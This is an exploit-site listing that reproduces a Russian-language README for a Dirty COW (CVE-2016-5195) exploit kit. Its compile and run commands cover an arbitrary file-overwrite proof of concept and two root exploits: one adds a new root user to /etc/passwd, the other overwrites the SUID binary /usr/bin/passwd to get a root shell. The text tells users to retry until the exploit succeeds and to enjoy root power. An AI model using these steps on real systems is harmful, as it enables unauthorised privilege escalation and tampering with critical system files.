Sploitus

Exploit for CVE-2016-5195

kitploit · 2026-08-25

Exploit Code

MARKDOWN66 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ARTTNBA3-CVE-2016-5195
# CVE-2016-5195

мои личные POC и EXPLOIT для CVE-2016-5195 (dirty COW)

# Использование

## POC: произвольная запись файлов

Просто POC этой CVE. Скомпилируйте файл `poc.c` следующим образом:

root@kitploit:~
    
    
    $ gcc poc.c -o poc -static -lpthread
    

Запустите его следующим образом:

root@kitploit:~
    
    
    ./poc destination_file fake_file
    

Убедитесь, что целевой файл хотя бы читаем. Содержимое целевого файла будет перезаписано содержимым фейкового. **В случае неудачи просто пробуйте ещё, пока не получится.**

**Будет записан только контент в пределах длины исходного файла**

## EXPLOIT: ПОЛУЧЕНИЕ ROOT

### I. Создание нового ROOT-пользователя

Скомпилируйте файл `root_newuser.c` следующим образом:

root@kitploit:~
    
    
    $ gcc root_newuser.c -o dirty -static -lpthread -lcrypt
    

Затем запустите его так:

root@kitploit:~
    
    
    $ ./dirty new_username new_password
    

Введите новое имя пользователя и пароль — он создаст нового пользователя С ROOT в файле `/etc/passwd`. Проверьте первую строку файла, чтобы убедиться в успехе, затем войдите под новым именем и паролем и **ПРОСТО НАСЛАЖДАЙТЕСЬ ВЛАСТЬЮ ROOT**

### II. Перезапись SUID-приложения для получения ROOT SHELL

Скомпилируйте файл `root_suid.c` следующим образом:

root@kitploit:~
    
    
    $ gcc root_suid.c -o dirty -static -lpthread
    

Затем просто запустите его без дополнительных аргументов. Проверьте, изменился ли `/usr/bin/passwd` (может пригодиться `sha256sum`), а затем выполните его. И **НАСТУПАЕТ ВРЕМЯ ROOT!**

# Анализ CVE-2016-5195

Вы можете посетить мой блог для получения дополнительной информации об этой CVE